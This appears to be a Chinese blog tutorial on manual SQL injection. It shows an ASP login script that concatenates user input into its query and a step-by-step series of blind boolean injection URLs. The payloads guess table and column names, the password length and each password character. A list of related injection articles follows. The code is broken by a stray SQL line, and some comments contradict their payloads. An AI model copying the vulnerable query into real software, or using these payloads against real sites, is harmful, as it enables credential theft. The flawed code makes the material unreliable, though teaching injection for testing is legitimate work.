SQL手工注入测试

最新推荐文章于 2024-08-01 20:47:16 发布
最新推荐文章于 2024-08-01 20:47:16 发布
阅读量5.6k 收藏 2
点赞数
分类专栏: 渗透相关 ASP/php/脚本相关
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SysProgram/article/details/52654522
版权
login.html 
<html>
<head><title>请登录</title></head>
<body>
 <div align="center">
   <form action="login.asp" method="post">
          请输入密码:
          <br><br>
          用 户:<input name="name" type="textbox">
          <br>
          密 码:<input name="pass" type="password">
          <br>
          <input value="登录" type="submit">
  </form>
 </div>
</body>
</html>

login.asp 
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>登录</title>
</head>
<body>
<%
inname=Request("name")
inpass=Request("pass")

set conn=server.createobject("ADODB.CONNECTION")
conn.open "Provider=microsoft.jet.oledb.4.0; Data Source="+server.mappath("/data.db")
sqlstr="SELECT * FROM data Where uname='" & inname & "'"

select * from data where name = 'admin' and 1=1 and 'a'='a'
Set rs=conn.Execute(sqlstr)

if inpass=rs("pass") then	
  response.write("<h3>登录成功!</h3>")
  response.write("用户编号:" & rs("uid") & "<br>")
else
  response.write("登录失败!")
end if

Set rs=Nothing
conn.close
%>
</body>
</html>

参数: http://192.168.10.1/login.asp?pass=test&name=test

原SQL语句:SELECT * FROM data Where uname='test'

1.构造能执行的SQL语句

http://192.168.10.1/login.asp?pass=test&name=test' and 1=1 and 'a'='a
相当于执行SQL语句为SELECT * FROM data Where uname='test' and 1=1 and 'a'='a'
如果执行成功,1=1就是我们可能执行的SQL语句

2.猜表名

将1=1替换 (select count(*) from data)>0
http://192.168.10.1/login.asp?pass=test&name=test' and (select count(*) from data)>0 and 'a'='a
相当于执行SQL语句
SELECT * FROM data Where uname='test' and (select count(*) from data)>0'

3.猜用户名字段

(select count(name) from data)>0


4.猜密码字段

(select count(pass) from data)>0


5.猜密码长度

//判断密码长度大于1

(Select count(*) from data where name='admin' and len(pass)>1)>0  

//判断密码长度大于10

(Select count(*) from data where name='admin' and len(pass)<10)>0


6.逐位猜密码

//猜测第1位密码是否为数字
(Select count(*) from data where uname='admin' and mid(pass,1,1)<'9')>0

//猜测第1位密码是否为字母

(Select count(*) from data where uname='admin' and mid(pass,1,1)>'a')>0

//猜测第1位密码是否等于c

(Select count(*) from data where uname='admin' and mid(pass,2,1)='c')>0


sysprogram
关注
专栏目录
手动识别 SQL 注入
weixin_62800523的博客
06-28 346
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作当用户自定义参数请求服务器中的动态资源或者在服务器上执行的代码包含了某个页面时,就会出现文件包含漏洞。在文本框中输入 1'(1 和一个单撇号)并提交该 ID。|:代表首先执行a命令,在执行b命令,不管a命令成功与否,都会去执行b命令。(当命令a失败时,它仍然会执行命令b,表示A命令语句的输出,作为B命令语句的输入执行
sql手工注入
橙子的博客
01-02 763
原理 利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 重点部份手工注入网站: 1:开发一个注入网页漏洞。(产生机理…,如何去挖掘一个网站注入漏洞) A:创建数据库的后台(加入数据) mysql> create database infor...
SQL注入方法大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
08-01 1654
SQL注入方法小百科某一个数据库的名字,这个数据库十分的特殊,里面存放着,大量的隐私信息information_schema数据库中的一个表schemata表中的一个字段(列),这个字段中记录着所有数据库的名称information_schema数据库中的一个表tables表中的一个字段(对应数据库的名字),这个字段里面记录着所有的数据库的名字tables表中的一个字段(相应数据库中所对应的表名),记录着与table_schema这个字段对应的数据库中对应的表名。
SQL手工注入流程
m0_70389551的博客
04-27 668
P.S.使用记事本打开:为配置文件添加数据库的密码【与小皮中的数据库中的密码一致】P.S.所以我们可以手动创建数据库。执行show databases函数后,返回的结果就是取自Information_schema数据库中的schemata表中的schema_name字段。①综上,上述GET提交方式中的id值在之后的服务器(业务逻辑层)中,会被当作sql语句执行的一个参数(例如where id = $id)。P.S、后端变量$id接收来自前端url网址中传递的id值,并用于sql语句查询中的一个参数。
SQL手工注入
peanut5036的博客
01-04 438
sql手工注入的一般流程,信息收集,判断注入点,联合查询等
手工SQL注入教程
xdy3008的专栏
11-06 2875
SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析,构造巧妙的SQL语句,从而成功获取想要的数据,是高手与“菜鸟”的根本区别。 SQL注入的原理,就是从客户端
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
此资源包含:宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB...
sql手工注入实战
mulincong的博客
05-30 2306
sql手工注入封神台靶场
SQL手工注入语句详解
m0_66160077的博客
07-09 1704
mysql 手工注入方法============================================================================================================================================?id=1'语句作用:测试是否存在注入,报错则存在-------------------------------------------------------------------------------
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
weixin_42939822的博客
03-16 3605
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
Mysql手工注入
09-16
资源分享者,资源爱好者,我是浪杉,点我资料关注,每日不定时分享全网优质源码!
SQL手工注入漏洞测试(Oracle数据库)
weixin_52374319的博客
05-15 1115
SQL手工注入漏洞测试(Oracle数据库) 0x01前言 本文旨在讲述Oracle数据库多种情况下如何进行注入 靶场地址:SQL手工注入漏洞测试(Oracle数据库)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 (mozhe.cn) 0x02 判断注入点 跟其他数据库一样,检测注入点都是可以通过拼接and语句进行判断。这里通过and 1=1 和and 1=2进行判断。实战中还可以通过延时函数进行判断。 http://124.70.71.251:44530/new_list.php?id=1%2
2024年软件测试最全渗透测试-SQL注入检测_sql注入 在线检测(1),看这篇足矣了
2401_84765537的博客
05-09 1406
而当我们使用 用户名‘:–的时候,!这时候对比两条sql就能发现,其实用户通过在用户名写入的sql符号将内部sql提前结束,并且。: SQL注入就是本来我只有我能操作数据库,本来只是让你输入内容就走,而你却输入命令,从而在我不知情下操作数据库。
手工SQL注入式脚本整理
传说中的蒙面大侠
01-17 1428
        1.判断是否有注入;and 1=1 ;and 1=2          2.初步判断是否是mssql ;and user>0   3.注入参数是字符and [查询条件] and =   4.搜索时没过滤参数的and [查询条件] and %25=   5.判断数据库系统   ;and (select count(*) from sysob
Sql注入(手工注入思路、绕过、防御)
Naive的博客
09-26 2795
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sql手工注入漏洞测试
04-29
SQL注入是一种常见的web应用程序漏洞攻击方式,攻击者可以通过利用这个漏洞来获取敏感信息、修改数据或者执行恶意操作。下面是手工测试SQL注入漏洞的一般步骤: 1. 确认目标网站是否存在SQL注入漏洞:在输入框中输入一些特殊字符,比如单引号、双引号、分号等等,如果页面返回了错误信息,那么就有可能存在注入漏洞。 2. 确认注入点的位置:在输入框中输入一些单引号,如果返回了错误信息,那么就可以确定注入点在这里。如果没有返回错误信息,可以尝试在其他输入框中输入单引号,看看是否会引起错误。 3. 确认注入点的类型:注入点可以是数字、字符串、布尔值等等。可以在注入点处输入一些特殊字符,比如单引号、双引号、分号等等,看看页面返回的是什么类型的错误信息。 4. 判断数据库类型:不同的数据库有不同的注入方式,需要先确定目标网站使用的是哪种数据库,可以通过一些特殊字符来判断,比如在注入点处输入 || 1=1 等等。 5. 构造注入语句:根据注入点的类型和数据库类型,构造相应的注入语句,比如 SELECT * FROM users WHERE username='admin' AND password='123456' 可以被注入为 SELECT * FROM users WHERE username='admin' AND password='' OR 1=1 -- '。 6. 提取数据:通过注入语句提取数据,比如 SELECT * FROM users WHERE username='admin' AND password='' OR 1=1 -- ' 可以提取所有用户的数据。可以通过不断的试错和尝试,提取出敏感信息或者执行恶意操作。 总之,手工测试SQL注入漏洞需要具备一定的技术和经验,需要不断地学习和尝试才能够掌握。同时,需要注意安全,不要在未经授权的情况下攻击他人的网站。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值